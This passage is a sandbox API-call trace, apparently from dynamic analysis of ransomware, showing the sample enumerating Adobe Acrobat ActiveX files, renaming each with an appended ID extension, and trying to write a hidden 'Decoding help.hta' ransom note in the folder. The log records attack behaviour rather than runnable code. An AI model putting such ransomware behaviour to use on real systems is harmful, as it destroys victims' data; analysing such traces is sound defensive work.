Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.494] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.494] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.JPN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN" [0052.494] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN" [0052.494] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN.[ID]g9uZrLhJaygpwRm1[ID]" [0052.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.jpn"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.JPN.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.jpn.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.494] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80567fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.KOR", cAlternateFileName="")) returned 1 [0052.494] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.494] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.494] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0052.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0052.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.495] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0052.495] CloseHandle (hObject=0xffffffff) returned 0 [0052.495] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0052.495] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.KOR") returned -1 [0052.495] lstrlenW (lpString="PDFShell.KOR") returned 12 [0052.495] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0052.495] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0052.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.KOR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR" [0052.495] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR" [0052.495] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR.[ID]g9uZrLhJaygpwRm1[ID]" [0052.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.kor"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.KOR.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.kor.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.068] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80567fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.NLD", cAlternateFileName="")) returned 1 [0053.068] lstrcpyW (in: lpString1=0x3380118, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.068] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.068] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.069] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.069] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.069] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.069] CloseHandle (hObject=0xffffffff) returned 0 [0053.069] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.069] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.NLD") returned -1 [0053.069] lstrlenW (lpString="PDFShell.NLD") returned 12 [0053.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.069] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.069] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.NLD" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD" [0053.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD" [0053.069] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD.[ID]g9uZrLhJaygpwRm1[ID]" [0053.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nld"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NLD.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nld.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.069] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80567fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.NOR", cAlternateFileName="")) returned 1 [0053.069] lstrcpyW (in: lpString1=0x3380118, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.070] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.070] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.070] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.070] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.070] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.070] CloseHandle (hObject=0xffffffff) returned 0 [0053.070] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.070] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.NOR") returned -1 [0053.070] lstrlenW (lpString="PDFShell.NOR") returned 12 [0053.070] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.070] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.070] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.NOR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR" [0053.070] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR" [0053.070] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR.[ID]g9uZrLhJaygpwRm1[ID]" [0053.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nor"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.NOR.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.nor.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.070] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d5bd20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.POL", cAlternateFileName="")) returned 1 [0053.070] lstrcpyW (in: lpString1=0x3380118, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.071] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.071] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.071] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.071] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.071] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.071] CloseHandle (hObject=0xffffffff) returned 0 [0053.071] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.071] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.POL") returned -1 [0053.071] lstrlenW (lpString="PDFShell.POL") returned 12 [0053.071] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.071] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.071] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.POL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL" [0053.071] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL" [0053.071] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL.[ID]g9uZrLhJaygpwRm1[ID]" [0053.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.pol"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.POL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.pol.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.178] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80541e60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDFShell.PTB", cAlternateFileName="")) returned 1 [0053.178] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.178] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.178] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0053.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0053.178] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0053.178] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0053.178] CloseHandle (hObject=0xffffffff) returned 0 [0053.178] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0053.178] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDFShell.PTB") returned -1 [0053.178] lstrlenW (lpString="PDFShell.PTB") returned 12 [0053.178] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0053.178] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0053.178] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="PDFShell.PTB" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB" [0053.178] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB" [0053.179] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB.[ID]g9uZrLhJaygpwRm1[ID]" [0053.179] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ptb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.PTB.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.ptb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.179] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d5bd20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49600, dwReserved0=0x0, 